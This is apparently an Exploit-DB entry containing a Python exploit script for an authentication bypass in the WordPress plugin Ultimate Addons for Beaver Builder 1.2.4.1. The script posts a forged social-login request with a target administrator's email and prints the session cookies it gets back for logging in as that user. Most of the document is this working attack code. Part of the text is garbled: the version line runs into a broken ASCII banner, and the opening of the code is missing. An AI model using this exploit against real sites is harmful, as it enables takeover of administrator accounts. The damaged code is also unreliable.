WordPress Ultimate Addons for Beaver Builder 1.2.4.1 – Authentication Bypass
# Exploit Title: WordPress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder > |_( ) || |
|______/____|__ /______ /|______ /_______ /__/_ | __/|____/____/|__||__|
/ / / / /|__|
Ultimate Addons for Beaver Builder ")[0]
except Exception as e:
print("Nonce Error: {}".format(e))
def auth_bypass(self):
try:
schema = urllib.parse.urlparse(self.page)
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
"action" : "uabb-lf-google-submit",
"name" : "raphaelrocks",
"email" : self.email,
"nonce" : self.nonce
})
if resp.status_code == 200:
print("Exploit Successful, Use the Cookies to Login: n{}".format(
json.dumps(self.sess.cookies.get_dict(), indent=4)
))
except Exception as e:
print("Auth Bypass Error: {}".format(e))
def begin_exploit(self):
self.get_nonce()
if self.nonce:
print("Found Nonce: {}".format(self.nonce))
self.auth_bypass()
else:
print("Failed to Gather Nonce")
if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
args = parser.parse_args()
ex = exploit(args.url, args.email)
ex.begin_exploit()
https://www.exploit-db.com/exploits/47832
Gloss